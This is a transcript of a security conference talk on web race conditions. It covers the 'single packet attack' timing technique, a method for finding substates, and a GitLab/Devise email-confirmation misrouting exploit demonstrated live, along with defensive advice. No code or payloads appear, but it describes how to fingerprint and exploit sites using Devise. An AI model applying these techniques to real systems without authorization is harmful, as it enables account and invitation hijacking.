 Thank you. Thanks for coming. I know it's an early start. Good morning and welcome to smashing the state machine, the true potential of web race conditions. Have you ever seen a vulnerability that made absolutely no sense? Something that didn't just leave you wondering why would anyone code that, but asking how is it even possible to write code that has that effect? Maybe you even got hold of the code and stared at it for hours and it still made no sense. And perhaps if you showed it to somebody else, they'd say something like, oh, it must be a race condition. In this session, I'm going to share with you tools and techniques to discover and exploit that kind of race condition. Let's start by surveying what we do understand, what race conditions have you seen or exploited in the wild. Maybe things like reusing a single-use voucher multiple times or bypassing some kind of rate limit or reviewing a single product multiple times. One of my favorite ones that I found is I noticed that you can reuse a valid single recapture solution multiple times within a short time window. And when I reported that to Google, they were like, oh, yeah, that's not good, but, well, unfortunately, our system is so distributed that we can't patch this. So that technique still works on a bunch of websites today. But all of these examples could be classed as limit overruns, right? They're all about doing something more times than you're supposed to. But if you go digging through every post that you can find on this topic, you'll land on one called race conditions on the web by Joseph Frankovich. And in this post, he describes four vulnerabilities. And three of them are regular limit overruns. And one of them is different. The vulnerability that he found took two months just for him and Facebook's security team to figure out how to replicate it. And the issue was that sometimes when changing your email, Facebook would put two confirmation codes for two different addresses using two different parameter names in a single email. Now, I had no idea what was happening here. And I don't think they did either. But one thing was clear. This wasn't a limit overrun vulnerability. And so last September, six years after I first read that blog post, I decided to try and figure out what happened. And gradually came to realize that the race condition attacks that we all know and love already are just toy vulnerabilities compared with what else is out there. So in this session, I'm going to show you the true potential of this attack class, tools and techniques to achieve this potential, and case studies and a live demo to show some of the insanity that's out there waiting for you to discover it. After that, I'll share where things can be taken further, how to prevent these attacks, and the key takeaways leaving five minutes for questions. On certain slides, you'll see there's a mortarboard icon. And that just means I've designed a free online replica of this vulnerability and published it in the Web Security Academy. So you can practice exploiting that vulnerability on a live system for yourself. Now, to communicate the true potential of this attack class, I'm going to use a multi-step vulnerability that I discovered by accident a while back. I noticed that when I logged into this website, it asked me to select a role before proceeding to the application. So I thought, okay, if I visualize the state machine for the user's role, it looks something like this. And well, maybe we can just jump from the role selection page to the back end without choosing a role and get some kind of privilege escalation going. And I tried that and it didn't work. And I thought, well, I guess it's secure then. I mean, look at that diagram. It looks pretty secure, right? But the diagram was actually wrong. It's missing a state because it's not zoomed in enough because it's assuming that the GET request to the role selection page doesn't change the application state. And as it so happened for reasons that I don't entirely understand, the applications was creating every session with administrative privileges and then the GET request was revoking those privileges. So by failing to zoom in, I almost missed quite a serious vulnerability. But, you know, that's just my bad, right? Because everyone knows that multi-step sequences are a wonderful source for all kinds of serious vulnerabilities and so it's essential to always zoom in as much as possible and test every possible permutation of a process like this. But researching race conditions, I found myself looking back at this finding and thinking, well, is that the furthest that we can zoom in? Or can we go further still? What if the application had dropped our privileges immediately using a second database statement? There would still be maybe one millisecond time window where every session had administrator privileges, but I would never have discovered it. And that's a little bit of a scary thought because, well, any login form could have that vulnerability. It doesn't need to be a multi-step login. And actually, worse than that, it shows any HTTP request might be transitioning the application through invisible, vulnerable substates like that one. And these could potentially lead to some serious attacks. In other words, we all know that multi-step sequences are really dangerous. And with race conditions, everything is potentially multi-step. That is the true potential of web race conditions and now it's time to start hacking some stuff. To discover a sub-state, we need a collision. That means we need two requests, one to trigger the sub-state or the race window and another that accesses the same resource at the same time. So in the example we just saw, that might mean trying to log in and access the admin panel simultaneously. However, there's a major barrier to making this happen which has plagued this attack class ever since it was invented pretty much, which is network jitter which randomly delays our requests inconsistently, meaning that the race windows don't line up and the vulnerabilities don't get discovered. To solve this problem, I've developed the single packet attack which lets you make 20 to 30 HTTP requests arrive at the server simultaneously, regardless of how bad the network jitter is on your connection. Under the hood, this technique is all about TCP and HTTP. The previously best known technique was called last byte synchronization. And it takes advantage of the fact that web servers generally won't start to process a request until the whole request has arrived. So with last byte sync, you withhold the final byte of each request and that makes the final packet of each request nice and small and it makes the jitter not quite so bad, but it only goes so far. But a couple years back, I read an academic white paper called Timeless Timing Attacks and there they noticed that with HTTP 2, you can actually stuff two entire requests into a single TCP packet. And they used that for timing attacks which was pretty cool. But I was wondering, well, can we adapt this and use it for race conditions? There's only one barrier here, really, which is to find a race condition reliably thanks to factors like server side jitter. We need more than two requests. So what I did was I took these two techniques and smushed them together to create the single packet attack which completes 20 to 30 requests in a single packet, eliminating network jitter. And I've just released this in an update to the open source tool turbo intruder. Now, this technique, frankly, is pretty obvious. And I was like, this is so obvious. I wonder if anyone else has already done it. And I googled and it turns out someone else implemented something quite similar for a master's project back in 2020 but nobody noticed. So why am I so excited about this technique? Well, it's because this isn't just some cool implementation trick. After refining this technique over months of research, it now works on all major web servers. I can still fit the entire algorithm on a single slide. And ultimately, it brings insane performance in a parcel that's so easy to implement, I think it will end up in all major web testing tools. The reason it's so easy to implement is that thanks to some creative abuse of Nagel's algorithm, which is in all operating system network stacks, you don't need to code a custom TCP or TLS stack. You can just take a HP2 library and bolt this feature onto the site. If you're tempted to make your own version, I'd say go for it. And I think Golang's HP2 stack is probably one of the easiest to extend in that manner. And I'm really looking forward to seeing where other people take this technique in the future because it can definitely be developed further. But of course, the thing I'm most excited about is the performance. So to benchmark this technique, I repeatedly sent a batch of 20 requests from Melbourne to Dublin, and I measured the gap in the execution time stamp of the first and last requests to reach the server in each batch. In other words, how close together the whole batch landed. And using last byte sync, I saw a median spread of four milliseconds and a standard deviation of three, which is, to be honest, not that bad. It's better than I expected. I think that's because I had data centers at both ends of this benchmark. And if you were using Australian consumer broadband, you might have a different experience. And then I retried it with a single packet attack and saw a median spread of one millisecond and a standard deviation of 0.3. In other words, the majority of these 20 requests traveling 17,000 kilometers were getting executed in the same millisecond on the target server. In terms of what that means in practice, well, you could say, okay, it makes this technique 4 to 10 times more effective than last byte sync. Or on one real vulnerability that I found, I was able to replicate the issue within 30 seconds using single packet attack and it took over two hours of automated attempts to replicate the same issue using last byte sync. In other words, if you want to kind of summarize this up in a little sound bite, I would say, by eliminating network jitter, the single packet attack makes remote race conditions local. Now that we've solved network jitter, it's time to go hunting for some bugs. Now limit overrun vulnerabilities, it's easy to find. You look for a limit, you try and overrun it. But going beyond that, things get a bit trickier. And after months of manual testing and discovering every possible pitfall, I've developed the following free state methodology to find these bugs reasonably efficiently. First, you predict where you might have potential collisions. Then you probe those places to identify clues that there's a substrate there. And finally, you prove the concept by figuring out what happened and using that knowledge to build an exploit. Prediction is just about efficiency. In theory, because everything is multi-step, every single request is an arbitrary complex multi-step process, we ought to test every possible combination of end points on the entire website and any other websites that have the same back end. But that's not very practical. So instead, we're going to hone in on places likely to have collisions that have serious consequences. After doing that, we can further more rule out end points that don't have as much collision potential. So for example, two threads that are editing a single piece of data at the same time, that could be quite interesting. Whereas if the two threads are just depending to the same piece of data, that's less likely to have an interesting outcome. Similarly, you can ask, well, are these requests going to be editing the same record in the database? If the password reset system is storing tokens in the user's table, then if you do two resets for two different users at the same time, then two different rows of this table are going to be edited and you're not going to have a collision. Meanwhile, if it's a password reset system that maybe SMSes you a pin and it stores the pin in your session, then you can use your single session to do resets for two users and cause a collision and maybe something interesting will happen. Once you've built your requests, it's time to just take them and probe for clues. The essential thing here is that it's quite easy to fail to recognize a clue. So the first step is to benchmark the normal standard behavior of the application by sending your requests one at a time with a delay between each of them so you don't trigger any races and then you just resend them all at once using the single packet attack and look for anomalies, clues, any deviation from the behavior that you saw during the baseline. If you don't see any, it might mean that they're secure or it could just mean that you need to tune your attack timing which I'll talk more about in a case study later on. Finally, by this point, we should have found an anomaly so all you need to do, which is often the hardest part, is actually understand what happened, clean it up and replicate the behavior and explore the impact. Now, a word of warning here. Exploring the impact might sound kind of obvious but if you're doing this methodology right and being ambitious with it, you're going to run into some quite weird and unfamiliar behavior and as a result the path to maximum impact may be quite hard to find. So I would suggest thinking of the behavior you found as a structural weakness and looking throughout the application to find security relevant features that rely on that structure and also don't just stop and report the first exploit that you find. I actually made that mistake myself and lost out on around $5,000 of bug bounty as a result. So now we're going to take a look at a tiny slice of what you might find if you apply this approach in the wild. GitLab lets you invite unregistered users to administer projects via their email address and I thought, okay, sounds juicy, I'll test it. So as a baseline, I just invited one address six times. This created one invitation, one invitation email and caused six responses saying, say to success. When I re-sent these requests in one packet, we saw one site of success, five error messages and two emails. So we've got two clues that we've hit a race condition here. The first clue is obviously two emails from six requests is quite suspicious. And the other one is that the responses that we got differed from when we did the baseline. Note that if we hadn't done the baseline and we just looked at those responses, we probably wouldn't have spotted that second clue. So using that race, I was able to create multiple invitations with the same email address, which I first thought, well, that's nice but kind of useless. But I noticed that the page on GitLab that lists pending invitations only displays one invitation per email address because it doesn't think that multiple ones can exist. So you can make a kind of a low privileged invitation. And if an admin sees it and deletes it, it actually effectively says user, well, it says user was successfully removed from project and replaces it with a higher level invitation behind the scenes. Now, that impact isn't amazing because you need quite high privileges to exploit it in the first place, but it got my attention kind of focused on GitLab. And it left me wondering, well, maybe there's another angle that I can take that's a bit more deliberate and will achieve a more serious impact. Now, one approach to finding inspiration for these kinds of race conditions is to look to classic multi-step exploits and see if you can find a race condition adaption. So, for example, there's a classic exploit where you add an extra product to your basket somewhere in the payment validation process after taking it to checkout. And if you time that right, you can get the extra product for free. And I noticed that if you draw the state machine for GitLab's email verification process, it looks kind of similar. So maybe if we change our email address while GitLab is validating our previous email address, it will end up validating the wrong one. And that would be high impact because it would let me hijack administrator invitations intended for other users. So, I tried probing for this and it didn't get any clues or anomalies, but I noticed that the email change response was arriving after the confirmation response every single time. Presumably because changing email was a slower operation. So, it was possible that there was a race condition present, but I just wasn't lining the requests up correctly. And after some trial and error, I was able to fix this by sending the confirmation request 90 milliseconds after the email change. But that approach, although it did work on GitLab, it's not ideal because it rules out the single packet attack. And I later discovered an alternative approach that I think is better. Web servers often delay requests that are sent too quickly. And we can take advantage of that by sending a single packet which contains first the slow processing request followed by a load of dummy requests that trigger the right amount of delay server side and then finally the fast processing one at the end. So, using that technique, you can do a kind of staggered attack and because the delay is implemented for you, server side network jitter is not going to make that technique fail. Lining the race window up like this on GitLab revealed a massive clue. Sometimes the email confirmation token was sent to the wrong address. Unfortunately for me, although this looked really exciting, the misdirected code was only ever valid for confirming the already confirmed address and therefore it was useless. But it showed that there's at least one sub-state hidden inside GitLab's email change endpoint. And so it's worth digging further on that functionality. And I'm going to do this via means of a live demo on a remote server hosted in Ireland over the conference Wi-Fi. Cool. So here we have GitLab. And here I'm just going to show if I change my email address, then the new one I entered is just been set as pending because I have to click the confirmation link to prove that I own this email. So that's what we're going to be targeting. So let's see how it goes. I did test this earlier. It's not 100% reliable. So, okay. On this Wi-Fi it was, I mean it's never really 100% reliable to be honest. Okay. So first I'm going to probe for, I'm going to probe for clues. So I'm going to try and change my email to six different email addresses in the same millisecond using the single packet attack. And I'm going to get all of these emails. They're all going to me, but every email address is unique. So I'm going to send this. The responses should arrive all at once. Yeah. Good. And the first kind of tiny little hint that something interesting might be happening is in this X runtime header. So we can see the server process this request in 350 milliseconds. And for something that we know is sending an email, that's quite fast. It's almost like they're passing some data to a background thread. And the background thread is sent in the email. And as soon as you've got data being passed between different threads, race conditions become a lot more likely. So that's a nice little hint, but it's definitely not evidence that there's a vulnerability there, right? For evidence, I'm going to check my inbox and we'll see what we have. Okay. So we've got our eight confirmation emails. And if I scroll through these with a bit of, right, there we go. Okay. So here this was sent to demo six at ports with a dot net. Sorry, it was sent to demo four, but it's intended to confirm demo six. So this is our clue. This has been sent to the wrong address. But it's not a vulnerability because this link isn't actually going to work. It's just going to say the confirmation token is invalid because that confirmation token has been overwritten by one of the ones that came after it and for some other reasons. So we've completed the probe phase and now we're going to prove the vulnerability by switching to exploit. And this is where things get a little bit less reliable. So I'm just sending two requests in the single packet. One is setting an email address that goes to my inbox. And there's one setting spoofed at local host, which is obviously not supposed to go to my inbox. And there's just one other thing to mention here, this little line here. So in order for the misdirected confirmation token to ever be valid, you have to trigger GitLab's resend token functionality, which you can do by changing your email address to the same value twice in a row. And if you don't do that, the token is never valid. And it took me around two months to discover that. So I'm going to run this and if we're really lucky, we'll get a misdirected token. And if we're even luckier, the token will actually work. Okay. So that looks kind of promising. This is intended to go to spoofed at local host. And it went to me. The killer question is, is the link going to work? It does first time. I should have pretended it was always going to work first time. Cool. So yeah, that was that. So I originally found that vulnerability on gitlab.com. And I could not resist obtaining the email address albino waxed at gitlab.com. And you can view that email address on my profile if you can go there. But that shiny finding left me wondering about what the code looked like. And the vulnerable code starts out in a Ruby on Rails framework called device. And the problem is there's an inconsistency between how the system decides where to send the email and what to put inside it. The email is sent to an address stored in an instance variable which is passed directly to the thread that sends the message. Meanwhile, the body of the email is populated using data from a server side template engine fetched from the database. Which means that the data in the database can change in the meantime leading to this discrepancy. And the impact is quite significant. So as I mentioned, you can use this to hijack pending invitations intended for other people and just gain administrative access to random projects. But also GitLab can be used as an open ID provider by third party websites to create a sign in with GitLab button. And depending on how the third party website does that integration, this can enable a load of follow up attacks against that third party all the way up to arbitrary account hijacking if you're lucky. If you were to find this bug in a major open ID provider, it would be a pretty big deal. Now, I reported this to GitLab and they patched it pretty fast. And then I reported it to devise and things did not go so well. Over the span of 200 days, I reported to over four addresses and I received no reply from them until last week. And there's no patch available yet, but at least they've applied. So maybe there'll be a patch in. So I went hunting for other bug bounty sites using this library. And as it turns out, it's really popular. Her loads of rails based sites use it. It's really easy to fingerprint because it registers an unauthenticated endpoint slash users slash confirmation that you can just spot. And because of the way the library is written, every website integrates with it slightly differently. And as such, every exploitation journey is slightly different and it's great practice and good fun. So a couple of highlights that I encountered during this process were some sites had visible locking. They were obviously only processing one email change at a time. So they were secure. On another site, the confirmation email that they generated didn't tell you which address it was supposed to confirm. So there were no hints that the vulnerability was present and it was really unreliable on that site. So I had to write a script that would do the attack, receive the email pass it, click the link and reload my profile to work out which email address had actually been confirmed and then I had to run it for 14 hours to actually compromise another email. On a couple of other targets, their visible email change functionality is secure against this attack, but device registers a different hidden endpoint for triggering an email resend and that was still vulnerable. Now with that, let's move on from GitLab and device. So race conditions are weird and I've saved the weirdest one for last. This was another token misrouting floor but the two requests that triggered it could be sent with a 20-minute delay in between them. So you might be thinking well that doesn't look like a race condition but it was really unreliable so chances are it was and after some analysis what I think was happening is that my email change requests were getting put on a queue which was then being processed by a multi-threaded batch job once every 30 minutes or so. So the timing of my request was practically irrelevant and the vulnerability was triggered basically by my request volume rather than the timing and also the only reason I discovered it is because I noticed two emails were sent to the same address which over the course of this research due to things like this I've begun to regard spotting anomalies like that as the single most important skill for finding race conditions especially for deferred ones like this where the response the application sends to your actual request is never going to tell you a vulnerability is present because the vulnerability hasn't even been triggered yet. Now I focused on email based attacks during my research but where else can you find these things? Well basically everywhere but one pattern that you may well encounter is partial construction attacks. These occur when an object is created in multiple steps creating an insecure middle state like you can see in the code snippet here where this token variable is briefly not set. I didn't use this as a case study because I actually wrote this code myself about 10 years ago but it was not supposed to be vulnerable. Now this type of attack is most likely to work on applications that support default or null type values and don't just throw exceptions when they encounter them so you think SQL PHP but that's not a strict requirement and for a completely different type of partial construction attack check out the linked vulnerability found by Natalie Silvanovic in Google's WebRTC implementation in Duo. Now another angle for further research is exploring the root cause of race conditions from the ground up which is unsafe combinations of data structures and locking strategies. There's three main strategies that you'll run into. The classic defense is locking. So for example PHP's default session handler only processes one request at a time in a given session. So that means two things. Firstly they're not gonna have a session-based race condition but also if you try to trigger a database layer race condition using a single session you'll fail to find it every time. So it's important to recognize this behavior and work around it by doing things like using multiple sessions. The probably the most common approach that you'll see in session handlers and orms is batching. So this is where they read the entire session let's say from the database into a local in-memory copy and then any reads and writes that the application does during that request are applied to that local copy and the whole copy is written back to the database at the end of the request life cycle. So this makes the values internally consistent during that request life cycle but as we saw with device as soon as data gets passed to a background threat you kind of outside the scope of that protection and everything falls apart and also if you have two requests operating on the same record simultaneously then generally one will end up overwriting the database changes from the other. Finally if there's no defense present all the bets are off basically and you see that most commonly with databases where people aren't making adequate uses of transactions but you also see it occasionally with custom session handlers and if you find a session handler that has that property that's not doing batching or locking that needs some really heavy testing because there's a whole load of completely plausible reasonable code patterns that suddenly have critical vulnerabilities if they're built on top of a vulnerable session handler so it's I would say I think it's almost impossible to write secure code at the application layer when you're building on top of a session handler that's not doing some kind of synchronization or batching now the final area for the research is improving the single packet attack so my implementation lets you get about 20 to 30 requests into one packet and if you get more than that the operating system just puts them in another packet shortly later and I'm certain you can fit a lot more requests into a single packet with enough effort you can totally do it with a custom TCP or TLS stack and there may be other easy ways of making it happen that I didn't think of I didn't try to push that side of the research that far because 20 requests is enough to cause a lot of damage in the wild by itself the other thing that will be really valuable on that angle is other ways of causing server side delays because that will let you trigger staggered attacks more reliably and it will also help out with the timing attack side a little bit as well and more generic techniques would be especially valuable there now one final word of advice this is a slide just for DEF CON and this might be a controversial take we'll see now in this session I've tried to squeeze six months of research into the space of 40 minutes and one thing that can get lost in that condensing process is how big the gap can get between exploiting something and actually understanding it so for example that githlab vulnerability I exploited githlab.com successfully in I can't remember but I think maybe two days whereas when I built my own local replica for the live demo it took me so I could get the token to be misrooted but the token was never ever valid I like ran attacks running every 10 seconds for weeks and it was never valid and it took me over two months to figure out why that was happening and gain the understanding to actually replicate it successfully and similarly I've mentioned timing information can be really valuable but front ends can do all kinds of different things with your requests which can cause other timing delays and massive timing red herrings now you can recognize that behavior and work around it but what I'm getting at is with this bow class you will encounter things that don't make sense and that's absolutely fine my advice is just to embrace the chaos normally I would say you should understand a system and then use that understanding to exploit it but with race conditions there's a risk that limits you to finding vulnerabilities that make sense and in my experience the coolest race conditions make the least sense in other words it's nice to have an explanation but all you really need is an exploit now for defense when a single request can push an application through multiple invisible substates understanding that application and predicting its behavior is incredibly difficult and defense is just not practical so my advice is try to eliminate substates entirely like the effects of each request should be atomic you can achieve that generally using your data store consistency features and another thing that will help with that is avoid mixing data sources so device was vulnerable because they sent an email to an address from an instance variable but took the contents from the database if they took the email address and the contents from the database they would have been absolutely fine the other key thing is to make sure that you know what kind of locking system your session handler is using because if it's not doing any locking that's bad news now there's a lot of further reading available the three key things I would suggest are check out the white paper that's basically the written up version of this presentation it does have a little bit of extra info and some different angles on stuff have a practice on our online labs because there's no substitute for real experience with these vulnerabilities and finally grab my code take the single packet attack and find some real vulnerabilities out in the wild if you have any crazy findings with these techniques that you'd like to share I'd absolutely love to hear all about it and the three key things to take away are the single packet attack makes remote race conditions local with race conditions everything is potentially multi-step and to find these bugs predict probe and proof I'm going to take five minutes of questions now if you have any more after that just come and chat to me at the back or chuck me an email thank you for listening any questions yeah can you use them there's a microphone over in the middle sorry yep what's uh what severity did uh gitlab eventually rate that vulnerability as uh so sadly for me gitlab rated it as medium uh which I don't think is accurate I think part of that was because I hadn't discovered uh so when I initially reported that I didn't discover the invitation hijacking angle I didn't realize getting a validated email would actually let you do that and by the time I realized that it was already fixed and paid out so I think if I'd originally reported it with that impact it would have got high whereas as it was it was only risky to people using gitlab uh via the signing with gitlab button which thankfully not many people are doing anyone else thanks for the really interesting talk uh you mentioned that uh front ends and load balancers cause issues with this sort of thing and you said there are some work arounds what they're not all trivial but you basically you have to observe what's happening so you can notice if you send your requests in a batch and the first request always comes back faster you can try changing the order of the requests uh and so sometimes by flipping by flipping the order you can fix the issue uh or just adding a dummy request at the start uh that's one way of dealing with it but there's there's like so many different things that they can do uh it's hard to give like a playbook for every kind of scenario I think the most important thing there is when you see a delay don't assume that that's something that's happening server side that could just be the load balancer so test that assumption before you try and work around it cool I think that's everyone